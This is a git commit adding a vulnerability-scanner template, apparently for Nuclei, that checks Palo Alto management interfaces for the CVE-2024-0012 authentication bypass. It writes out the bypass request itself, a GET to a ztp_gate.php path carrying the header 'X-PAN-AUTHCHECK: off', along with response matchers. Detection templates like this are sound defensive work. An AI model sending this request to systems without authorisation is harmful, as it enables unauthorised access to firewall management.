Create CVE-2024-0012.yaml

patch-16
johnk3r 2024-11-19 15:02:14 -03:00 committed by GitHub
parent c9248c078a
commit 00f9a4105d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2024-0012
info:
name: Authentication Bypass in the Management Web Interface
author: johnk3r
severity: critical
tags: cve2024,cve,paloalto,globalprotect
requests:
- method: GET
path:
- "{{BaseURL}}/php/ztp_gate.php/.js.map"
headers:
X-PAN-AUTHCHECK: off
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Zero Touch Provisioning</title>"
- "Zero Touch Provisioning (ZTP)"
- type: word
words:
- "/scripts/cache/mainui.javascript"
part: body